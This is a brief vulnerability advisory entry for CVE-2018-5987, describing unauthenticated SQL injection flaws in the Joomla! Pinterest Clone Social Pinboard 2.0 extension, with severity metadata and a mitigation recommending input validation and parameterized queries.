vendor: Joomla! Pinterest Clone Social Pinboard
by: Ihsan Sencan
CVSS: 9.8 (CRITICAL)
SQL Injection
CWE: 89
Product Name: Joomla! Pinterest Clone Social Pinboard
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CVE: CVE-2018-5987
CPE: a:apptha:joomla!_pinterest_clone_social_pinboard:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018
Joomla! Pinterest Clone Social Pinboard 2.0 – SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 contains multiple SQL injection vulnerabilities. They exist because user-supplied input in multiple parameters of the application is insufficiently sanitized. An attacker can inject arbitrary SQL code to manipulate the application's SQL queries, allowing the manipulation or disclosure of arbitrary data. The vulnerabilities can be exploited remotely and without authentication.
Mitigation:
Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection.